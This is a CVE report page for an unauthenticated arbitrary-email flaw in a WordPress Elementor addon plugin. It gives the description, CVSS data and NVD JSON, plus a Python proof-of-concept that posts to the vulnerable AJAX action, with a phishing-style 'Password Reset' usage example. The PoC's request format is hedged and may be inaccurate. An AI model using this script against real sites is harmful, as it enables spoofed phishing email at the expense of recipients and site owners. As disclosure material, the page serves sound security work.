Security Vulnerability Report
中文
CVE-2025-10873 CVSS 5.3 MEDIUM

CVE-2025-10873

Published: 2025-11-05 06:15:33
Last Modified: 2026-04-15 00:35:42

Description

The ElementInvader Addons for Elementor WordPress plugin before 1.4.1 allows unauthenticated user to send arbitrary e-mails to arbitrary addresses due to missing authorization on the elementinvader_addons_for_elementor_forms_send_form action.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ElementInvader Addons for Elementor < 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-10873 PoC - Unauthenticated Arbitrary Email Sending # Affected: ElementInvader Addons for Elementor < 1.4.1 def send_arbitrary_email(target_url, to_email, from_email, subject, body): """ Send arbitrary emails through vulnerable plugin endpoint """ endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious request data = { 'action': 'elementinvader_addons_for_elementor_forms_send_form', 'post_id': '1', # May vary depending on configuration 'form_data': { 'to_email': to_email, 'from_email': from_email, 'subject': subject, 'body': body } } try: response = requests.post(endpoint, data=data, timeout=10) print(f"[*] Request sent to: {endpoint}") print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] Email sent successfully!") print(f"[*] To: {to_email}") print(f"[*] Subject: {subject}") return True else: print("[-] Failed to send email") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 6: print("Usage: python cve-2025-10873.py <target_url> <to_email> <from_email> <subject> <body>") print("Example: python cve-2025-10873.py http://target.com [email protected] [email protected] 'Password Reset' 'Click here'") sys.exit(1) target = sys.argv[1] to_email = sys.argv[2] from_email = sys.argv[3] subject = sys.argv[4] body = sys.argv[5] send_arbitrary_email(target, to_email, from_email, subject, body)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10873", "sourceIdentifier": "[email protected]", "published": "2025-11-05T06:15:32.870", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ElementInvader Addons for Elementor WordPress plugin before 1.4.1 allows unauthenticated user to send arbitrary e-mails to arbitrary addresses due to missing authorization on the elementinvader_addons_for_elementor_forms_send_form action."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/2eb133db-e1c5-409e-94f8-b71edca5db16/", "source": "[email protected]"}]}}